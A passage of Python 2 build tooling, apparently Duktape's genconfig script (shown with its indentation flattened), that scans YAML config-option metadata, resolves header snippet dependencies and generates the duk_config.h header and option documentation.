# Add original snippets. This fills in the required nodes
# recursively.
for sn in snippets:
add(sn)
# Figure out fill-ins by looking for snippets not in original
# list and without any unserialized dependent nodes.
handled = {}
for sn in snippets:
handled[sn] = True
keepgoing = True
while keepgoing:
keepgoing = False
for sn in snlist:
if handled.has_key(sn):
continue
success = True
for dep in graph.get(sn, []):
if not handled.has_key(dep):
success = False
if success:
snippets.insert(idx_deps, sn)
idx_deps += 1
snippets.insert(idx_deps, Snippet([ '' ]))
idx_deps += 1
handled[sn] = True
keepgoing = True
break
# XXX: detect and handle loops cleanly
for sn in snlist:
if handled.has_key(sn):
continue
logger.debug('UNHANDLED KEY')
logger.debug('PROVIDES: %r' % sn.provides)
logger.debug('REQUIRES: %r' % sn.requires)
logger.debug('\n'.join(sn.lines))
#logger.debug(repr(graph))
#logger.debug(repr(snlist))
logger.debug('Resolved helper defines: %r' % resolved)
logger.debug('Resolved %d helper defines' % len(resolved))
def serialize_snippet_list(snippets):
ret = []
emitted_provides = {}
for k in assumed_provides.keys():
emitted_provides[k] = True
for sn in snippets:
ret += sn.lines
for k in sn.provides.keys():
emitted_provides[k] = True
for k in sn.requires.keys():
if not emitted_provides.has_key(k):
# XXX: conditional warning, happens in some normal cases
logger.warning('define %r required, not provided so far' % k)
pass
return '\n'.join(ret)
def remove_duplicate_newlines(x):
ret = []
empty = False
for line in x.split('\n'):
if line == '':
if empty:
pass
else:
ret.append(line)
empty = True
else:
empty = False
ret.append(line)
return '\n'.join(ret)
def scan_use_defs(dirname):
global use_defs, use_defs_list
use_defs = {}
use_defs_list = []
for fn in os.listdir(dirname):
root, ext = os.path.splitext(fn)
if not root.startswith('DUK_USE_') or ext != '.yaml':
continue
with open(os.path.join(dirname, fn), 'rb') as f:
doc = yaml.load(f)
if doc.get('example', False):
continue
if doc.get('unimplemented', False):
logger.warning('unimplemented: %s' % fn)
continue
dockeys = doc.keys()
for k in dockeys:
if not k in allowed_use_meta_keys:
logger.warning('unknown key %s in metadata file %s' % (k, fn))
for k in required_use_meta_keys:
if not k in dockeys:
logger.warning('missing key %s in metadata file %s' % (k, fn))
use_defs[doc['define']] = doc
keys = use_defs.keys()
keys.sort()
for k in keys:
use_defs_list.append(use_defs[k])
def scan_opt_defs(dirname):
global opt_defs, opt_defs_list
opt_defs = {}
opt_defs_list = []
for fn in os.listdir(dirname):
root, ext = os.path.splitext(fn)
if not root.startswith('DUK_OPT_') or ext != '.yaml':
continue
with open(os.path.join(dirname, fn), 'rb') as f:
doc = yaml.load(f)
if doc.get('example', False):
continue
if doc.get('unimplemented', False):
logger.warning('unimplemented: %s' % fn)
continue
dockeys = doc.keys()
for k in dockeys:
if not k in allowed_opt_meta_keys:
logger.warning('unknown key %s in metadata file %s' % (k, fn))
for k in required_opt_meta_keys:
if not k in dockeys:
logger.warning('missing key %s in metadata file %s' % (k, fn))
opt_defs[doc['define']] = doc
keys = opt_defs.keys()
keys.sort()
for k in keys:
opt_defs_list.append(opt_defs[k])
def scan_use_tags():
global use_tags, use_tags_list
use_tags = {}
for doc in use_defs_list:
for tag in doc.get('tags', []):
use_tags[tag] = True
use_tags_list = use_tags.keys()
use_tags_list.sort()
def scan_tags_meta(filename):
global tags_meta
with open(filename, 'rb') as f:
tags_meta = yaml.load(f)
def scan_helper_snippets(dirname): # DUK_F_xxx snippets
global helper_snippets
helper_snippets = []
for fn in os.listdir(dirname):
if (fn[0:6] != 'DUK_F_'):
continue
logger.debug('Autoscanning snippet: %s' % fn)
helper_snippets.append(Snippet.fromFile(os.path.join(dirname, fn)))
def get_opt_defs(removed=True, deprecated=True, unused=True):
ret = []
for doc in opt_defs_list:
# XXX: aware of target version
if removed == False and doc.get('removed', None) is not None:
continue
if deprecated == False and doc.get('deprecated', None) is not None:
continue
if unused == False and doc.get('unused', False) == True:
continue
ret.append(doc)
return ret
def get_use_defs(removed=True, deprecated=True, unused=True):
ret = []
for doc in use_defs_list:
# XXX: aware of target version
if removed == False and doc.get('removed', None) is not None:
continue
if deprecated == False and doc.get('deprecated', None) is not None:
continue
if unused == False and doc.get('unused', False) == True:
continue
ret.append(doc)
return ret
def validate_platform_file(filename):
sn = Snippet.fromFile(filename)
for req in platform_required_provides:
if req not in sn.provides:
raise Exception('Platform %s is missing %s' % (filename, req))
# DUK_SETJMP, DUK_LONGJMP, DUK_JMPBUF_TYPE are optional, fill-in
# provides if none defined.
def validate_architecture_file(filename):
sn = Snippet.fromFile(filename)
for req in architecture_required_provides:
if req not in sn.provides:
raise Exception('Architecture %s is missing %s' % (filename, req))
# Byte order and alignment defines are allowed to be missing,
# a fill-in will handle them. This is necessary because for
# some architecture byte order and/or alignment may vary between
# targets and may be software configurable.
# XXX: require automatic detection to be signaled?
# e.g. define DUK_USE_ALIGN_BY -1
# define DUK_USE_BYTE_ORDER -1
def validate_compiler_file(filename):
sn = Snippet.fromFile(filename)
for req in compiler_required_provides:
if req not in sn.provides:
raise Exception('Compiler %s is missing %s' % (filename, req))
def get_tag_title(tag):
meta = tags_meta.get(tag, None)
if meta is None:
return tag
else:
return meta.get('title', tag)
def get_tag_description(tag):
meta = tags_meta.get(tag, None)
if meta is None:
return None
else:
return meta.get('description', None)
def get_tag_list_with_preferred_order(preferred):
tags = []
# Preferred tags first
for tag in preferred:
if tag not in tags:
tags.append(tag)
# Remaining tags in alphabetic order
for tag in use_tags_list:
if tag not in tags:
tags.append(tag)
logger.debug('Effective tag order: %r' % tags)
return tags
def rst_format(text):
# XXX: placeholder, need to decide on markup conventions for YAML files
ret = []
for para in text.split('\n'):
if para == '':
continue
ret.append(para)
return '\n\n'.join(ret)
def cint_encode(x):
if not isinstance(x, (int, long)):
raise Exception('invalid input: %r' % x)
# XXX: unsigned constants?
if x > 0x7fffffff or x < -0x80000000:
return '%dLL' % x
elif x > 0x7fff or x < -0x8000:
return '%dL' % x
else:
return '%d' % x
def cstr_encode(x):
if isinstance(x, unicode):
x = x.encode('utf-8')
if not isinstance(x, str):
raise Exception('invalid input: %r' % x)
res = '"'
term = False
has_terms = False
for c in x:
if term:
# Avoid ambiguous hex escapes
res += '" "'
term = False
has_terms = True
o = ord(c)
if o < 0x20 or o > 0x7e or c in '"\\':
res += '\\x%02x' % o
term = True
else:
res += c
res += '"'
if has_terms:
res = '(' + res + ')'
return res
#
# Autogeneration of option documentation
#
# Shared helper to generate DUK_USE_xxx documentation.
# XXX: unfinished placeholder
def generate_option_documentation(opts, opt_list=None, rst_title=None, include_default=False):
ret = FileBuilder(use_cpp_warning=opts.use_cpp_warning)
tags = get_tag_list_with_preferred_order(doc_tag_order)
title = rst_title
ret.rst_heading(title, '=', doubled=True)
handled = {}
for tag in tags:
first = True
for doc in opt_list:
if tag != doc['tags'][0]: # sort under primary tag
continue
dname = doc['define']
desc = doc.get('description', None)
if handled.has_key(dname):
raise Exception('define handled twice, should not happen: %r' % dname)
handled[dname] = True
if first: # emit tag heading only if there are subsections
ret.empty()
ret.rst_heading(get_tag_title(tag), '=')
tag_desc = get_tag_description(tag)
if tag_desc is not None:
ret.empty()
ret.line(rst_format(tag_desc))
first = False
ret.empty()
ret.rst_heading(dname, '-')
if desc is not None:
ret.empty()
ret.line(rst_format(desc))
if include_default:
ret.empty()
ret.line('Default: ``' + str(doc['default']) + '``') # XXX: rst or other format
for doc in opt_list:
dname = doc['define']
if not handled.has_key(dname):
raise Exception('unhandled define (maybe missing from tags list?): %r' % dname)
ret.empty()
return ret.join()
def generate_config_option_documentation(opts):
defs = get_use_defs()
return generate_option_documentation(opts, opt_list=defs, rst_title='Duktape config options', include_default=True)
#
# Helpers for duk_config.h generation
#
def get_forced_options(opts):
# Forced options, last occurrence wins (allows a base config file to be
# overridden by a more specific one).
forced_opts = {}
for val in opts.force_options_yaml:
doc = yaml.load(StringIO(val))
for k in doc.keys():
if use_defs.has_key(k):
pass # key is known
else:
logger.warning('option override key %s not defined in metadata, ignoring' % k)
forced_opts[k] = doc[k] # shallow copy
if len(forced_opts.keys()) > 0:
logger.debug('Overrides: %s' % json.dumps(forced_opts))
return forced_opts
# Emit a default #define / #undef for an option based on
# a config option metadata node (parsed YAML doc).
def emit_default_from_config_meta(ret, doc, forced_opts, undef_done, active_opts):
defname = doc['define']
defval = forced_opts.get(defname, doc['default'])
# NOTE: careful with Python equality, e.g. "0 == False" is true.
if isinstance(defval, bool) and defval == True:
ret.line('#define ' + defname)
active_opts[defname] = True
elif isinstance(defval, bool) and defval == False:
if not undef_done:
ret.line('#undef ' + defname)
else:
# Default value is false, and caller has emitted
# an unconditional #undef, so don't emit a duplicate
pass
active_opts[defname] = False
elif isinstance(defval, (int, long)):
# integer value
ret.line('#define ' + defname + ' ' + cint_encode(defval))
active_opts[defname] = True
elif isinstance(defval, (str, unicode)):
# verbatim value
ret.line('#define ' + defname + ' ' + defval)
active_opts[defname] = True
elif isinstance(defval, dict):
if defval.has_key('verbatim'):
# verbatim text for the entire line
ret.line(defval['verbatim'])
elif defval.has_key('string'):
# C string value
ret.line('#define ' + defname + ' ' + cstr_encode(defval['string']))
else:
raise Exception('unsupported value for option %s: %r' % (defname, defval))
active_opts[defname] = True
else:
raise Exception('unsupported value for option %s: %r' % (defname, defval))
# Add a header snippet for detecting presence of DUK_OPT_xxx feature
# options and warning/erroring if application defines them. Useful for
# Duktape 2.x migration.
def add_legacy_feature_option_checks(opts, ret):
ret.chdr_block_heading('Checks for legacy feature options (DUK_OPT_xxx)')
ret.empty()
defs = []
for doc in get_opt_defs():
if doc['define'] not in defs:
defs.append(doc['define'])
defs.sort()
for optname in defs:
ret.line('#if defined(%s)' % optname)
ret.cpp_warning_or_error('unsupported legacy feature option %s used' % optname, opts.sanity_strict)
ret.line('#endif')
ret.empty()
# Add a header snippet for checking consistency of DUK_USE_xxx config
# options, e.g. inconsistent options, invalid option values.
def add_config_option_checks(opts, ret):
ret.chdr_block_heading('Checks for config option consistency (DUK_USE_xxx)')
ret.empty()
defs = []
for doc in get_use_defs():
if doc['define'] not in defs:
defs.append(doc['define'])
defs.sort()
for optname in defs:
doc = use_defs[optname]
dname = doc['define']
# XXX: more checks
if doc.get('removed', None) is not None:
ret.line('#if defined(%s)' % dname)
ret.cpp_warning_or_error('unsupported config option used (option has been removed): %s' % dname, opts.sanity_strict)
ret.line('#endif')
elif doc.get('deprecated', None) is not None:
ret.line('#if defined(%s)' % dname)
ret.cpp_warning_or_error('unsupported config option used (option has been deprecated): %s' % dname, opts.sanity_strict)
ret.line('#endif')
for req in doc.get('requires', []):
ret.line('#if defined(%s) && !defined(%s)' % (dname, req))
ret.cpp_warning_or_error('config option %s requires option %s (which is missing)' % (dname, req), opts.sanity_strict)
ret.line('#endif')
for req in doc.get('conflicts', []):
ret.line('#if defined(%s) && defined(%s)' % (dname, req))
ret.cpp_warning_or_error('config option %s conflicts with option %s (which is also defined)' % (dname, req), opts.sanity_strict)
ret.line('#endif')
ret.empty()
ret.snippet_relative('cpp_exception_sanity.h.in')
ret.empty()
# Add a header snippet for providing a __OVERRIDE_DEFINES__ section.
def add_override_defines_section(opts, ret):
ret.empty()
ret.line('/*')
ret.line(' * You may add overriding #define/#undef directives below for')
ret.line(' * customization. You of course cannot un-#include or un-typedef')
ret.line(' * anything; these require direct changes above.')
ret.line(' */')
ret.empty()
ret.line('/* __OVERRIDE_DEFINES__ */')
ret.empty()
# Development time helper: add DUK_ACTIVE which provides a runtime C string
# indicating what DUK_USE_xxx config options are active at run time. This
# is useful in genconfig development so that one can e.g. diff the active
# run time options of two headers. This is intended just for genconfig
# development and is not available in normal headers.
def add_duk_active_defines_macro(ret):
ret.chdr_block_heading('DUK_ACTIVE_DEFINES macro (development only)')
idx = 0
for doc in get_use_defs():
defname = doc['define']
ret.line('#if defined(%s)' % defname)
ret.line('#define DUK_ACTIVE_DEF%d " %s"' % (idx, defname))
ret.line('#else')
ret.line('#define DUK_ACTIVE_DEF%d ""' % idx)
ret.line('#endif')
idx += 1
tmp = []
for i in xrange(idx):
tmp.append('DUK_ACTIVE_DEF%d' % i)
ret.line('#define DUK_ACTIVE_DEFINES ("Active: ["' + ' '.join(tmp) + ' " ]")')
#
# duk_config.h generation
#
# Generate a duk_config.h where platform, architecture, and compiler are
# all either autodetected or specified by user.
#
# Autodetection is based on a configured list of supported platforms,
# architectures, and compilers. For example, platforms.yaml defines the
# supported platforms and provides a helper define (DUK_F_xxx) to use for
# detecting that platform, and names the header snippet to provide the
# platform-specific definitions. Necessary dependencies (DUK_F_xxx) are
# automatically pulled in.
#
# Automatic "fill ins" are used for mandatory platform, architecture, and
# compiler defines which have a reasonable portable default. This reduces
# e.g. compiler-specific define count because there are a lot compiler
# macros which have a good default.
def generate_duk_config_header(opts, meta_dir):
ret = FileBuilder(base_dir=os.path.join(meta_dir, 'header-snippets'), \
use_cpp_warning=opts.use_cpp_warning)
# Parse forced options. Warn about missing forced options when it is
# strongly recommended that the option is provided.
forced_opts = get_forced_options(opts)
for doc in use_defs_list:
if doc.get('warn_if_missing', False) and not forced_opts.has_key(doc['define']):
logger.warning('Recommended config option ' + doc['define'] + ' not provided')
# Gather a map of "active options" for genbuiltins.py. This is used to
# implement proper optional built-ins, e.g. if a certain config option
# (like DUK_USE_ES6_PROXY) is disabled, the corresponding objects and
# properties are dropped entirely. The mechanism is not perfect: it won't
# detect fixup changes for example.
active_opts = {}
platforms = None
with open(os.path.join(meta_dir, 'platforms.yaml'), 'rb') as f:
platforms = yaml.load(f)
architectures = None
with open(os.path.join(meta_dir, 'architectures.yaml'), 'rb') as f:
architectures = yaml.load(f)
compilers = None
with open(os.path.join(meta_dir, 'compilers.yaml'), 'rb') as f:
compilers = yaml.load(f)
# XXX: indicate feature option support, sanity checks enabled, etc
# in general summary of options, perhaps genconfig command line?
ret.line('/*')
ret.line(' * duk_config.h configuration header generated by genconfig.py.')
ret.line(' *')
ret.line(' * Git commit: %s' % opts.git_commit or 'n/a')
ret.line(' * Git describe: %s' % opts.git_describe or 'n/a')
ret.line(' * Git branch: %s' % opts.git_branch or 'n/a')
ret.line(' *')
if opts.platform is not None:
ret.line(' * Platform: ' + opts.platform)
else:
ret.line(' * Supported platforms:')
for platf in platforms['autodetect']:
ret.line(' * - %s' % platf.get('name', platf.get('check')))
ret.line(' *')
if opts.architecture is not None:
ret.line(' * Architecture: ' + opts.architecture)
else:
ret.line(' * Supported architectures:')
for arch in architectures['autodetect']:
ret.line(' * - %s' % arch.get('name', arch.get('check')))
ret.line(' *')
if opts.compiler is not None:
ret.line(' * Compiler: ' + opts.compiler)
else:
ret.line(' * Supported compilers:')
for comp in compilers['autodetect']:
ret.line(' * - %s' % comp.get('name', comp.get('check')))
ret.line(' *')
ret.line(' */')
ret.empty()
ret.line('#if !defined(DUK_CONFIG_H_INCLUDED)')
ret.line('#define DUK_CONFIG_H_INCLUDED')
ret.empty()
ret.chdr_block_heading('Intermediate helper defines')
# DLL build affects visibility attributes on Windows but unfortunately
# cannot be detected automatically from preprocessor defines or such.
# DLL build status is hidden behind DUK_F_DLL_BUILD. and there are two
ret.chdr_comment_line('DLL build detection')
if opts.dll:
ret.line('/* configured for DLL build */')
ret.line('#define DUK_F_DLL_BUILD')
else:
ret.line('/* not configured for DLL build */')
ret.line('#undef DUK_F_DLL_BUILD')
ret.empty()
idx_deps = len(ret.vals) # position where to emit DUK_F_xxx dependencies
# Feature selection, system include, Date provider
# Most #include statements are here
if opts.platform is not None:
ret.chdr_block_heading('Platform: ' + opts.platform)
ret.snippet_relative('platform_cppextras.h.in')
ret.empty()
# XXX: better to lookup platforms metadata
include = 'platform_%s.h.in' % opts.platform
abs_fn = os.path.join(meta_dir, 'platforms', include)
validate_platform_file(abs_fn)
ret.snippet_absolute(abs_fn)
else:
ret.chdr_block_heading('Platform autodetection')
ret.snippet_relative('platform_cppextras.h.in')
ret.empty()
for idx, platf in enumerate(platforms['autodetect']):
check = platf.get('check', None)
include = platf['include']
abs_fn = os.path.join(meta_dir, 'platforms', include)
validate_platform_file(abs_fn)
if idx == 0:
ret.line('#if defined(%s)' % check)
else:
if check is None:
ret.line('#else')
else:
ret.line('#elif defined(%s)' % check)
ret.line('/* --- %s --- */' % platf.get('name', '???'))
ret.snippet_absolute(abs_fn)
ret.line('#endif /* autodetect platform */')
ret.empty()
ret.snippet_relative('platform_sharedincludes.h.in')
ret.empty()
byteorder_provided_by_all = True # byteorder provided by all architecture files
alignment_provided_by_all = True # alignment provided by all architecture files
packedtval_provided_by_all = True # packed tval provided by all architecture files
if opts.architecture is not None:
ret.chdr_block_heading('Architecture: ' + opts.architecture)
# XXX: better to lookup architectures metadata
include = 'architecture_%s.h.in' % opts.architecture
abs_fn = os.path.join(meta_dir, 'architectures', include)
validate_architecture_file(abs_fn)
sn = ret.snippet_absolute(abs_fn)
if not sn.provides.get('DUK_USE_BYTEORDER', False):
byteorder_provided_by_all = False
if not sn.provides.get('DUK_USE_ALIGN_BY', False):
alignment_provided_by_all = False
if sn.provides.get('DUK_USE_PACKED_TVAL', False):
ret.line('#define DUK_F_PACKED_TVAL_PROVIDED') # signal to fillin
else:
packedtval_provided_by_all = False
else:
ret.chdr_block_heading('Architecture autodetection')
for idx, arch in enumerate(architectures['autodetect']):
check = arch.get('check', None)
include = arch['include']
abs_fn = os.path.join(meta_dir, 'architectures', include)
validate_architecture_file(abs_fn)
if idx == 0:
ret.line('#if defined(%s)' % check)
else:
if check is None:
ret.line('#else')
else:
ret.line('#elif defined(%s)' % check)
ret.line('/* --- %s --- */' % arch.get('name', '???'))
sn = ret.snippet_absolute(abs_fn)
if not sn.provides.get('DUK_USE_BYTEORDER', False):
byteorder_provided_by_all = False
if not sn.provides.get('DUK_USE_ALIGN_BY', False):
alignment_provided_by_all = False
if sn.provides.get('DUK_USE_PACKED_TVAL', False):
ret.line('#define DUK_F_PACKED_TVAL_PROVIDED') # signal to fillin
else:
packedtval_provided_by_all = False
ret.line('#endif /* autodetect architecture */')
ret.empty()
if opts.compiler is not None:
ret.chdr_block_heading('Compiler: ' + opts.compiler)
# XXX: better to lookup compilers metadata
include = 'compiler_%s.h.in' % opts.compiler
abs_fn = os.path.join(meta_dir, 'compilers', include)
validate_compiler_file(abs_fn)
sn = ret.snippet_absolute(abs_fn)
else:
ret.chdr_block_heading('Compiler autodetection')
for idx, comp in enumerate(compilers['autodetect']):
check = comp.get('check', None)
include = comp['include']
abs_fn = os.path.join(meta_dir, 'compilers', include)
validate_compiler_file(abs_fn)
if idx == 0:
ret.line('#if defined(%s)' % check)
else:
if check is None:
ret.line('#else')
else:
ret.line('#elif defined(%s)' % check)
ret.line('/* --- %s --- */' % comp.get('name', '???'))
sn = ret.snippet_absolute(abs_fn)
ret.line('#endif /* autodetect compiler */')
ret.empty()
# DUK_F_UCLIBC is special because __UCLIBC__ is provided by an #include
# file, so the check must happen after platform includes. It'd be nice
# for this to be automatic (e.g. DUK_F_UCLIBC.h.in could indicate the
# dependency somehow).
ret.snippet_absolute(os.path.join(meta_dir, 'helper-snippets', 'DUK_F_UCLIBC.h.in'))
ret.empty()
# XXX: platform/compiler could provide types; if so, need some signaling
# defines like DUK_F_TYPEDEFS_DEFINED
# Number types
if opts.c99_types_only:
ret.snippet_relative('types1.h.in')
ret.line('/* C99 types assumed */')
ret.snippet_relative('types_c99.h.in')
ret.empty()
else:
ret.snippet_relative('types1.h.in')
ret.line('#if defined(DUK_F_HAVE_INTTYPES)')
ret.line('/* C99 or compatible */')
ret.empty()
ret.snippet_relative('types_c99.h.in')
ret.empty()
ret.line('#else /* C99 types */')
ret.empty()
ret.snippet_relative('types_legacy.h.in')
ret.empty()
ret.line('#endif /* C99 types */')
ret.empty()
ret.snippet_relative('types2.h.in')
ret.empty()
ret.snippet_relative('64bitops.h.in')
ret.empty()
# Platform, architecture, compiler fillins. These are after all
# detection so that e.g. DUK_SPRINTF() can be provided by platform
# or compiler before trying a fill-in.
ret.chdr_block_heading('Fill-ins for platform, architecture, and compiler')
ret.snippet_relative('platform_fillins.h.in')
ret.empty()
ret.snippet_relative('architecture_fillins.h.in')
if not byteorder_provided_by_all:
ret.empty()
ret.snippet_relative('byteorder_fillin.h.in')
if not alignment_provided_by_all:
ret.empty()
ret.snippet_relative('alignment_fillin.h.in')
ret.empty()
ret.snippet_relative('compiler_fillins.h.in')
ret.empty()
ret.snippet_relative('inline_workaround.h.in')
ret.empty()
if not packedtval_provided_by_all:
ret.empty()
ret.snippet_relative('packed_tval_fillin.h.in')
# Object layout
ret.snippet_relative('object_layout.h.in')
ret.empty()
# Detect and reject 'fast math'
ret.snippet_relative('reject_fast_math.h.in')
ret.empty()
# Emit forced options. If a corresponding option is already defined
# by a snippet above, #undef it first.
tmp = Snippet(ret.join().split('\n'))
first_forced = True
for doc in get_use_defs(removed=not opts.omit_removed_config_options,
deprecated=not opts.omit_deprecated_config_options,
unused=not opts.omit_unused_config_options):
defname = doc['define']
if not forced_opts.has_key(defname):
continue
if not doc.has_key('default'):
raise Exception('config option %s is missing default value' % defname)
if first_forced:
ret.chdr_block_heading('Forced options')
first_forced = False
undef_done = False
if tmp.provides.has_key(defname):
ret.line('#undef ' + defname)
undef_done = True
emit_default_from_config_meta(ret, doc, forced_opts, undef_done, active_opts)
ret.empty()
# If manually-edited snippets don't #define or #undef a certain
# config option, emit a default value here. This is useful to
# fill-in for new config options not covered by manual snippets
# (which is intentional).
tmp = Snippet(ret.join().split('\n'))
need = {}
for doc in get_use_defs(removed=False):
need[doc['define']] = True
for k in tmp.provides.keys():
if need.has_key(k):
del need[k]
need_keys = sorted(need.keys())
if len(need_keys) > 0:
ret.chdr_block_heading('Autogenerated defaults')
for k in need_keys:
logger.debug('config option %s not covered by manual snippets, emitting default automatically' % k)
emit_default_from_config_meta(ret, use_defs[k], {}, False, active_opts)
ret.empty()
if len(opts.fixup_header_lines) > 0:
ret.chdr_block_heading('Fixups')
for line in opts.fixup_header_lines:
ret.line(line)
ret.empty()
add_override_defines_section(opts, ret)
# Date provider snippet is after custom header and overrides, so that
# the user may define e.g. DUK_USE_DATE_NOW_GETTIMEOFDAY in their
# custom header.
ret.snippet_relative('date_provider.h.in')
ret.empty()
ret.fill_dependencies_for_snippets(idx_deps)
if opts.emit_legacy_feature_check:
add_legacy_feature_option_checks(opts, ret)
if opts.emit_config_sanity_check:
add_config_option_checks(opts, ret)
if opts.add_active_defines_macro:
add_duk_active_defines_macro(ret)
# Derived defines (DUK_USE_INTEGER_LE, etc) from DUK_USE_BYTEORDER.
# Duktape internals currently rely on the derived defines. This is
# after sanity checks because the derived defines are marked removed.
ret.snippet_relative('byteorder_derived.h.in')
ret.empty()
ret.line('#endif /* DUK_CONFIG_H_INCLUDED */')
ret.empty() # for trailing newline
return remove_duplicate_newlines(ret.join()), active_opts
#
# Main
#
def add_genconfig_optparse_options(parser, direct=False):
# Forced options from multiple sources are gathered into a shared list
# so that the override order remains the same as on the command line.
force_options_yaml = []
def add_force_option_yaml(option, opt, value, parser):
# XXX: check that YAML parses
force_options_yaml.append(value)
def add_force_option_file(option, opt, value, parser):
# XXX: check that YAML parses
with open(value, 'rb') as f:
force_options_yaml.append(f.read())
def add_force_option_define(option, opt, value, parser):
tmp = value.split('=')
if len(tmp) == 1:
doc = { tmp[0]: True }
elif len(tmp) == 2:
doc = { tmp[0]: tmp[1] }
else:
raise Exception('invalid option value: %r' % value)
force_options_yaml.append(yaml.safe_dump(doc))
def add_force_option_undefine(option, opt, value, parser):
tmp = value.split('=')
if len(tmp) == 1:
doc = { tmp[0]: False }
else:
raise Exception('invalid option value: %r' % value)
force_options_yaml.append(yaml.safe_dump(doc))
fixup_header_lines = []
def add_fixup_header_line(option, opt, value, parser):
fixup_header_lines.append(value)
def add_fixup_header_file(option, opt, value, parser):
with open(value, 'rb') as f:
for line in f:
if line[-1] == '\n':
line = line[:-1]
fixup_header_lines.append(line)
if direct:
parser.add_option('--metadata', dest='config_metadata', default=None, help='metadata directory')
parser.add_option('--output', dest='output', default=None, help='output filename for C header or RST documentation file')
parser.add_option('--output-active-options', dest='output_active_options', default=None, help='output JSON file with active config options information')
else:
# Different option name when called through configure.py,
# also no --output option.
parser.add_option('--config-metadata', dest='config_metadata', default=None, help='metadata directory (defaulted based on configure.py script path)')
parser.add_option('--platform', dest='platform', default=None, help='platform (default is autodetect)')
parser.add_option('--compiler', dest='compiler', default=None, help='compiler (default is autodetect)')
parser.add_option('--architecture', dest='architecture', default=None, help='architecture (default is autodetec)')
parser.add_option('--c99-types-only', dest='c99_types_only', action='store_true', default=False, help='assume C99 types, no legacy type detection')
parser.add_option('--dll', dest='dll', action='store_true', default=False, help='dll build of Duktape, affects symbol visibility macros especially on Windows')
parser.add_option('--support-feature-options', dest='support_feature_options', action='store_true', default=False, help=optparse.SUPPRESS_HELP)
parser.add_option('--emit-legacy-feature-check', dest='emit_legacy_feature_check', action='store_true', default=False, help='emit preprocessor checks to reject legacy feature options (DUK_OPT_xxx)')
parser.add_option('--emit-config-sanity-check', dest='emit_config_sanity_check', action='store_true', default=False, help='emit preprocessor checks for config option consistency (DUK_USE_xxx)')
parser.add_option('--omit-removed-config-options', dest='omit_removed_config_options', action='store_true', default=False, help='omit removed config options from generated headers')
parser.add_option('--omit-deprecated-config-options', dest='omit_deprecated_config_options', action='store_true', default=False, help='omit deprecated config options from generated headers')
parser.add_option('--omit-unused-config-options', dest='omit_unused_config_options', action='store_true', default=False, help='omit unused config options from generated headers')
parser.add_option('--add-active-defines-macro', dest='add_active_defines_macro', action='store_true', default=False, help='add DUK_ACTIVE_DEFINES macro, for development only')
parser.add_option('--define', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_define, default=force_options_yaml, help='force #define option using a C compiler like syntax, e.g. "--define DUK_USE_DEEP_C_STACK" or "--define DUK_USE_TRACEBACK_DEPTH=10"')
parser.add_option('-D', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_define, default=force_options_yaml, help='synonym for --define, e.g. "-DDUK_USE_DEEP_C_STACK" or "-DDUK_USE_TRACEBACK_DEPTH=10"')
parser.add_option('--undefine', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_undefine, default=force_options_yaml, help='force #undef option using a C compiler like syntax, e.g. "--undefine DUK_USE_DEEP_C_STACK"')
parser.add_option('-U', type='string', metavar='OPTION', dest='force_options_yaml', action='callback', callback=add_force_option_undefine, default=force_options_yaml, help='synonym for --undefine, e.g. "-UDUK_USE_DEEP_C_STACK"')
parser.add_option('--option-yaml', type='string', metavar='YAML', dest='force_options_yaml', action='callback', callback=add_force_option_yaml, default=force_options_yaml, help='force option(s) using inline YAML (e.g. --option-yaml "DUK_USE_DEEP_C_STACK: true")')
parser.add_option('--option-file', type='string', metavar='FILENAME', dest='force_options_yaml', action='callback', callback=add_force_option_file, default=force_options_yaml, help='YAML file(s) providing config option overrides')
parser.add_option('--fixup-file', type='string', metavar='FILENAME', dest='fixup_header_lines', action='callback', callback=add_fixup_header_file, default=fixup_header_lines, help='C header snippet file(s) to be appended to generated header, useful for manual option fixups')
parser.add_option('--fixup-line', type='string', metavar='LINE', dest='fixup_header_lines', action='callback', callback=add_fixup_header_line, default=fixup_header_lines, help='C header fixup line to be appended to generated header (e.g. --fixup-line "#define DUK_USE_FASTINT")')
parser.add_option('--sanity-warning', dest='sanity_strict', action='store_false', default=True, help='emit a warning instead of #error for option sanity check issues')
parser.add_option('--use-cpp-warning', dest='use_cpp_warning', action='store_true', default=False, help='emit a (non-portable) #warning when appropriate')
if direct:
parser.add_option('--git-commit', dest='git_commit', default=None, help='git commit hash to be included in header comments')
parser.add_option('--git-describe', dest='git_describe', default=None, help='git describe string to be included in header comments')
parser.add_option('--git-branch', dest='git_branch', default=None, help='git branch string to be included in header comments')
parser.add_option('--quiet', dest='quiet', action='store_true', default=False, help='Suppress info messages (show warnings)')
parser.add_option('--verbose', dest='verbose', action='store_true', default=False, help='Show verbose debug messages')
def parse_options():
commands = [
'duk-config-header',
'config-documentation'
]
parser = optparse.OptionParser(
usage='Usage: %prog [options] COMMAND',
description='Generate a duk_config.h or config option documentation based on config metadata.',
epilog='COMMAND can be one of: ' + ', '.join(commands) + '.'
)
add_genconfig_optparse_options(parser, direct=True)
(opts, args) = parser.parse_args()
return opts, args
def genconfig(opts, args):
# Log level.
if opts.quiet:
logger.setLevel(logging.WARNING)
elif opts.verbose:
logger.setLevel(logging.DEBUG)
if opts.support_feature_options:
raise Exception('--support-feature-options and support for DUK_OPT_xxx feature options are obsolete, use DUK_USE_xxx config options instead')
meta_dir = opts.config_metadata
if opts.config_metadata is None:
if os.path.isdir(os.path.join('.', 'config-options')):
opts.config_metadata = '.'
if opts.config_metadata is not None and os.path.isdir(opts.config_metadata):
meta_dir = opts.config_metadata
metadata_src_text = 'Using metadata directory: %r' % meta_dir
else:
raise Exception('metadata argument must be a directory (tar.gz no longer supported)')
scan_helper_snippets(os.path.join(meta_dir, 'helper-snippets'))
scan_use_defs(os.path.join(meta_dir, 'config-options'))
scan_opt_defs(os.path.join(meta_dir, 'feature-options'))
scan_use_tags()
scan_tags_meta(os.path.join(meta_dir, 'tags.yaml'))
logger.debug('%s, scanned%d DUK_USE_XXX, %d helper snippets' % \
(metadata_src_text, len(use_defs.keys()), len(helper_snippets)))
logger.debug('Tags: %r' % use_tags_list)
if len(args) == 0:
raise Exception('missing command')
cmd = args[0]
if cmd == 'duk-config-header':
# Generate a duk_config.h header with platform, compiler, and
# architecture either autodetected (default) or specified by
# user.
desc = [
'platform=' + ('any', opts.platform)[opts.platform is not None],
'architecture=' + ('any', opts.architecture)[opts.architecture is not None],
'compiler=' + ('any', opts.compiler)[opts.compiler is not None]
]
if opts.dll:
desc.append('dll mode')
